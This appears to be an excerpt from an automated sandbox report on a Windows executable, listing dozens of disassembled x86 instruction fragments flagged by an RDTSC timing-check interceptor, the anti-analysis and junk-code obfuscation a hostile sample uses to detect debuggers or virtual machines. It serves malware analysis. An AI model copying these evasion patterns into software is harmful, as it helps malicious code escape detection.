Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6C851B second address: 6C8578 instructions: 0x00000000 rdtsc 0x00000002 je 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FED74F3E51Fh 0x0000000f popad 0x00000010 add dword ptr [esp], 25CE0F5Ch 0x00000017 ja 00007FED74F3E51Ch 0x0000001d lea ebx, dword ptr [ebp+1244FF98h] 0x00000023 sub dword ptr [ebp+122D1820h], edi 0x00000029 xchg eax, ebx 0x0000002a jnc 00007FED74F3E528h 0x00000030 jmp 00007FED74F3E522h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 js 00007FED74F3E518h 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6DB477 second address: 6DB47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6DB47B second address: 6DB489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FED74F3E51Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E888A second address: 6E88DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 je 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FED7550886Ah 0x00000014 popad 0x00000015 jmp 00007FED7550886Dh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jnl 00007FED75508866h 0x00000024 jmp 00007FED75508877h 0x00000029 popad 0x0000002a jmp 00007FED7550886Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8A34 second address: 6E8A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FED74F3E516h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8A40 second address: 6E8A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8A44 second address: 6E8A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8A48 second address: 6E8A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8A55 second address: 6E8AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FED74F3E546h 0x00000011 jmp 00007FED74F3E528h 0x00000016 jmp 00007FED74F3E528h 0x0000001b push eax 0x0000001c push edx 0x0000001d jns 00007FED74F3E516h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8E45 second address: 6E8E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FED75508866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E8F83 second address: 6E8F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E90DE second address: 6E90E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E90E6 second address: 6E9102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FED74F3E523h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E9102 second address: 6E9106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6E9106 second address: 6E910A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6EA224 second address: 6EA22A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6EA22A second address: 6EA234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FED74F3E516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6BD391 second address: 6BD395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F6E89 second address: 6F6E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F6E95 second address: 6F6EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED75508872h 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F7284 second address: 6F72B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007FED74F3E52Ch 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007FED74F3E524h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jo 00007FED74F3E516h 0x0000001c jne 00007FED74F3E516h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F72B7 second address: 6F72CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FED75508872h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F76EE second address: 6F7708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F7708 second address: 6F7733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push ecx 0x00000008 jg 00007FED75508866h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FED75508866h 0x00000017 jmp 00007FED75508874h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F7733 second address: 6F7737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FAE3A second address: 6FAEC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FED75508868h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007FED7550886Eh 0x00000019 pushad 0x0000001a jmp 00007FED7550886Fh 0x0000001f jmp 00007FED7550886Bh 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 pushad 0x00000029 jg 00007FED75508868h 0x0000002f pushad 0x00000030 popad 0x00000031 push ecx 0x00000032 jp 00007FED75508866h 0x00000038 pop ecx 0x00000039 popad 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e jmp 00007FED75508877h 0x00000043 pop eax 0x00000044 jmp 00007FED75508870h 0x00000049 push 4AB5381Bh 0x0000004e pushad 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FB540 second address: 6FB575 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FED74F3E525h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FBA00 second address: 6FBA15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FC519 second address: 6FC51D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FC51D second address: 6FC52B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FC52B second address: 6FC530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FE525 second address: 6FE52B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FE52B second address: 6FE530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70152F second address: 7015C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 jnc 00007FED7550886Ch 0x0000000e pop esi 0x0000000f nop 0x00000010 jc 00007FED7550886Ch 0x00000016 or edi, 272462D9h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FED75508868h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 add dword ptr [ebp+122D1B93h], ebx 0x0000003e mov edi, eax 0x00000040 mov si, cx 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ecx 0x00000048 call 00007FED75508868h 0x0000004d pop ecx 0x0000004e mov dword ptr [esp+04h], ecx 0x00000052 add dword ptr [esp+04h], 0000001Bh 0x0000005a inc ecx 0x0000005b push ecx 0x0000005c ret 0x0000005d pop ecx 0x0000005e ret 0x0000005f xchg eax, ebx 0x00000060 je 00007FED7550886Eh 0x00000066 jno 00007FED75508868h 0x0000006c push eax 0x0000006d pushad 0x0000006e jp 00007FED75508868h 0x00000074 push eax 0x00000075 push edx 0x00000076 push esi 0x00000077 pop esi 0x00000078 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7067E6 second address: 7067FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FED74F3E51Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7067FD second address: 706802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70775A second address: 707765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FED74F3E516h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 707765 second address: 7077C2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FED75508868h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d stc 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FED75508868h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov ebx, dword ptr [ebp+122D17F3h] 0x00000032 xchg eax, esi 0x00000033 jbe 00007FED75508877h 0x00000039 push edx 0x0000003a jmp 00007FED7550886Fh 0x0000003f pop edx 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jl 00007FED7550886Ch 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7077C2 second address: 7077C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 708766 second address: 70876B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7079B2 second address: 7079B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70876B second address: 7087AD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FED75508868h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FED75508868h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov bh, ah 0x00000027 add dword ptr [ebp+1247B672h], ebx 0x0000002d push 00000000h 0x0000002f stc 0x00000030 push 00000000h 0x00000032 sub dword ptr [ebp+122D2383h], edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push edx 0x0000003d pop edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70965D second address: 709662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7088ED second address: 7088F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 709662 second address: 709668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7098A6 second address: 7098AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70A83D second address: 70A8B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D1D2Ah], edx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b xor ebx, dword ptr [ebp+122D36C8h] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov dword ptr [ebp+122D1820h], eax 0x0000002e mov eax, dword ptr [ebp+122D052Dh] 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FED74F3E518h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e push FFFFFFFFh 0x00000050 nop 0x00000051 je 00007FED74F3E51Ch 0x00000057 pushad 0x00000058 push esi 0x00000059 pop esi 0x0000005a pushad 0x0000005b popad 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FED74F3E51Ch 0x00000065 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70B7F3 second address: 70B7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7105F7 second address: 7105FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7114CE second address: 7114D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70F785 second address: 70F789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71080E second address: 710812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7126C7 second address: 7126D1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FED74F3E51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 713571 second address: 713582 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 710812 second address: 710818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 70F847 second address: 70F85D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 713582 second address: 713589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7127CE second address: 7127D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7136CC second address: 7136FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FED74F3E521h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FED74F3E528h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 716408 second address: 71640C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71BF0D second address: 71BF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71BF13 second address: 71BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FED75508878h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FED75508877h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71BF55 second address: 71BF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FED74F3E51Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71BF68 second address: 71BF6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71BF6E second address: 71BF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71BF74 second address: 71BF79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B6C8 second address: 71B6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B6CE second address: 71B70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FED75508866h 0x0000000a popad 0x0000000b jmp 00007FED75508870h 0x00000010 pushad 0x00000011 jno 00007FED75508866h 0x00000017 jmp 00007FED75508871h 0x0000001c jl 00007FED75508866h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B70C second address: 71B710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B710 second address: 71B716 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B867 second address: 71B871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B871 second address: 71B882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jl 00007FED75508866h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B882 second address: 71B88C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FED74F3E516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 71B88C second address: 71B895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72080A second address: 72082D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7208F9 second address: 720909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 720909 second address: 54BAE0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FED74F3E518h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 12D87AABh 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FED74F3E518h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b stc 0x0000002c push dword ptr [ebp+122D0C21h] 0x00000032 jmp 00007FED74F3E51Ah 0x00000037 call dword ptr [ebp+122D244Ah] 0x0000003d pushad 0x0000003e sub dword ptr [ebp+122D1C6Ch], edi 0x00000044 xor eax, eax 0x00000046 mov dword ptr [ebp+122D1C6Ch], ecx 0x0000004c sub dword ptr [ebp+122D1C6Ch], esi 0x00000052 mov edx, dword ptr [esp+28h] 0x00000056 stc 0x00000057 mov dword ptr [ebp+122D36A8h], eax 0x0000005d jmp 00007FED74F3E521h 0x00000062 mov esi, 0000003Ch 0x00000067 stc 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D1C56h], ecx 0x00000072 lodsw 0x00000074 ja 00007FED74F3E522h 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e pushad 0x0000007f xor dword ptr [ebp+122D1990h], edi 0x00000085 or ebx, 4FB5547Ch 0x0000008b popad 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 clc 0x00000091 push eax 0x00000092 js 00007FED74F3E524h 0x00000098 push eax 0x00000099 push edx 0x0000009a push eax 0x0000009b push edx 0x0000009c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 727940 second address: 727944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
